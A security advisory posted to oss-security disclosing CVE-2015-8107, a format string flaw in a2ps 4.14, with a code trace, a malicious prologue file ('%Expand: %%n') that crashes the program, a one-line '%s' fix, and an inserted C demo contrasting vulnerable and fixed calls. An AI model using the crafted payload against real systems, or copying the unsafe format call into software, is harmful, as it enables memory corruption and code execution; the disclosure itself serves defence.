Date: Mon, 16 Nov 2015 19:24:18 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability

Dear List,

I am writing this to report a format string vulnerability in a2ps 
(version 4.14, which is the latest version).
I have also already been assigned a CVE identifier from MITRE, 
"CVE-2015-8107", so I want to make this vulnerability public.

- Target Platform
   Linux
- Target Version
   4.14 (Latest Version)

- Vulnerability description
When a user runs a2ps with a maliciously crafted pro (a2ps prologue) file, an 
attacker can execute arbitrary code.
The function output_file processes the %Expand command in the pro file.
The variable `expansion' in the function output_file may hold a 
malicious input string, which is then used as the format argument of vsprintf.

-- Step 1. (output.c 524 line)

524     expansion = ((char *)
                          expand_user_string (job, FIRST_FILE (job),
                                (const uchar *) "Expand: requirement",
                                (const uchar *) token));

For instance, the variable expansion will point to the string "%n" when 
a text line "%Expand: %%\n" exists in an input pro file.

-- Step 2. (output.c 525 line)

525    output (dest, expansion);

output() is called in line 525, and the argument `expansion' is used as 
the format string, which can be malicious, as we described in step 1.

-- Step 3. (output.c 873 line)
182    void output (struct output * out, const char *format, ...){
      ...
202   ds_unsafe_cat_vsprintf (out->chunk,format, args);
      ...

The variable format, which can be malicious, is passed on to 
ds_unsafe_cat_vsprintf() in line 202.

-- Step 4. (dstring.c 321 line)
321    void ds_unsafe_cat_vsprintf (struct dstring * ds, const char 
*format, va_list args){
       ...
326    vsprintf (ds->content + ds->len, format, args);
       ...

The value of format, which can be malicious, is used as the format argument of 
vsprintf in line 326; therefore arbitrary code can be executed.

-- Step 5. Our malicious input
"exploit.pro"
===================================
% -*-postscript-*-
% PostScript Prologue
%
% $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
%

%
% This file is part of a2ps.
%
% This program is free software; you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3, or (at your option)
% any later version.
%
% This program is distributed in the hope that it will be useful,
% but WITHOUT ANY WARRANTY; without even the implied warranty of
% MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
% GNU General Public License for more details.
%
% You should have received a copy of the GNU General Public License
% along with this program; see the file COPYING.  If not, write to
% the Free Software Foundation, 59 Temple Place - Suite 330,
% Boston, MA 02111-1307, USA.
%
Documentation
The layout is the same as samp(bw)samp, but alternating gray and white 
lines.
There are two macros defining the behavior:
samp(pro.matrix.cycle)samp defines the length of the cycle (number of white
and gray lines).  It defaults to 6.
samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3.
EndDocumentation
% -- code follows this line --
%%IncludeResource: file base.ps
%%IncludeResource: file a2ps.hdr
%%BeginResource: procset a2ps-matrix-Prolog 2.0 1

% Function T(ab), jumps to the n-th tabulation in the current line
/T {
  cw mul x0 add y0 moveto
} bind def

% Function n: move to the next line
/n { %def
  /y0 y0 bfs sub store
  % Draw a grey background
  /nline nline 1 add def
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
% @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@
%Expand: %%n
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

%Expand:  nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
    gsave
      newpath
      x v get y0 currentfont /Descent get currentfontsize mul add moveto
      pw 0 rlineto
      0 bfs rlineto
      pw neg 0 rlineto
      closepath
      0.9 setgray
      fill
    grestore
  } if
  x0 y0 moveto
} bind def

% Function N: show and move to the next line
/N {
  Show
  n
} bind def

/S {
  Show
} bind def

/p {
  false UL
  false BX
%Face: Plain Courier bfs
  Show
} bind def

/sy {
  false UL
  false BX
%Face: Symbol Symbol bfs
  Show
} bind def

/k {
  false UL
  false BX
%Face: Keyword Courier-Oblique bfs
  Show
} bind def

/K {
  false UL
  false BX
%Face: Keyword_strong Courier-Bold bfs
  Show
} bind def

/c {
  false UL
  false BX
%Face: Comment Courier-Oblique bfs
  Show
} bind def

/C {
  false UL
  false BX
%Face: Comment_strong Courier-BoldOblique bfs
  Show
} bind def

/l {
  false UL
  false BX
%Face: Label Helvetica bfs
  Show
} bind def

/L {
  false UL
  false BX
%Face: Label_strong Helvetica-Bold bfs
  Show
} bind def

/str{
  false UL
  false BX
%Face: String Times-Roman bfs
  Show
} bind def

/e{
  false UL
  true BX
%Face: Error Helvetica-Bold bfs
  Show
} bind def

%%EndResource
%%BeginSetup
% The font for line numbering
/f# /Helvetica findfont bfs .6 mul scalefont def
/nline 0 def
%%EndSetup
===================================

Execute
===================================
~ $ a2ps --version
GNU a2ps 4.14
Written by Akim Demaille, Miguel Santana.

Copyright (c) 1988-1993 Miguel Santana
Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

~ $ a2ps --prologue=exploit test.tex -o test.ps
aborted (core dumped)
===================================

- How to fix
(output.c 525 line)
525    output (dest, expansion); ===> output (dest, "%s", expansion);
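To make the difference between the vulnerable call in step 2 and the one-line fix above concrete, here is an added, self-contained C example (not a2ps code; the dstring struct, the bounded ds_cat_vsprintf, and the render_*/has_conversion_directive helpers are simplified stand-ins written for this demonstration). It mirrors the call chain output() -> ds_unsafe_cat_vsprintf() -> vsprintf() and shows that with output(dest, expansion) the printf engine interprets whatever the prologue's %Expand line produced, while with output(dest, "%s", expansion) the same text is treated purely as data. The real a2ps code uses unbounded vsprintf; vsnprintf is used here only so the demo cannot overflow its buffer, which does not change the format-string issue being shown.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-in for a2ps's struct dstring (assumption: not the real layout). */
struct dstring {
    char *content;
    size_t len;
    size_t size;
};

static void ds_init(struct dstring *ds, size_t size) {
    ds->content = calloc(size, 1);
    ds->len = 0;
    ds->size = size;
}

/* Bounded analogue of ds_unsafe_cat_vsprintf(): whatever arrives as `format`
   is interpreted by the printf engine. a2ps calls vsprintf (unbounded);
   vsnprintf is used here only so this demo cannot overflow `content`. */
static void ds_cat_vsprintf(struct dstring *ds, const char *format, va_list args) {
    int n = vsnprintf(ds->content + ds->len, ds->size - ds->len, format, args);
    if (n > 0) {
        size_t room = ds->size - ds->len - 1;
        ds->len += ((size_t)n < room) ? (size_t)n : room;
    }
}

/* Analogue of output() in output.c: variadic, forwards its format string. */
static void output(struct dstring *out, const char *format, ...) {
    va_list args;
    va_start(args, format);
    ds_cat_vsprintf(out, format, args);
    va_end(args);
}

/* Vulnerable pattern (output.c line 525): the expanded %Expand text becomes
   the format string itself. In this demo it is only ever called with input
   free of conversion directives, because "%n" here would be undefined behaviour.
   Caller frees the returned buffer. */
char *render_vulnerable(const char *expansion) {
    struct dstring ds;
    ds_init(&ds, 256);
    output(&ds, expansion);
    return ds.content;
}

/* Patched pattern from the "How to fix" line: the expansion is an argument
   to a fixed "%s" format, so "%n" or "%x" in it is copied literally. */
char *render_fixed(const char *expansion) {
    struct dstring ds;
    ds_init(&ds, 256);
    output(&ds, "%s", expansion);
    return ds.content;
}

/* Defensive check: does a string contain anything printf would treat as a
   conversion? "%%" is a literal percent and is skipped; any other '%' (including
   a trailing lone one) counts. Handy for flagging suspicious prologue input
   before it reaches a formatting routine. */
int has_conversion_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}

int main(void) {
    char *v = render_vulnerable("100%%");   /* engine collapses "%%" -> "%"  */
    char *f = render_fixed("100%%");        /* data path keeps "%%" verbatim */
    printf("vulnerable: %s\nfixed:      %s\n", v, f);
    printf("\"%%n\" flagged: %d\n", has_conversion_directive("%n"));
    free(v);
    free(f);
    return 0;
}
```

The observable difference on harmless input ("%%" rendered as "%" versus kept as "%%") is the same mechanism that turns a "%n" from the prologue into a write primitive in the unpatched build; the "%s" fix closes it because the format is now a compile-time literal and the expansion can no longer steer the printf engine.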

- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. 
Our analyzer reported an alarm at a2ps dstring.c line 326, so we looked 
at the a2ps source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the 
absence of fatal bugs in C source. Sparrow is designed based on Abstract 
Interpretation, and the analysis is sound by design. Sparrow adopts a 
number of well-founded static analysis techniques[2,3] for scalability, 
precision, and user convenience.

References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo 
Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like 
Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun 
Yi. PLDI'12

Sincerely, Woosuk Lee & Jong-Gwon Kim

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee@...as.snu.ac.kr
-----------------------------
-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim@...as.snu.ac.kr
-----------------------------
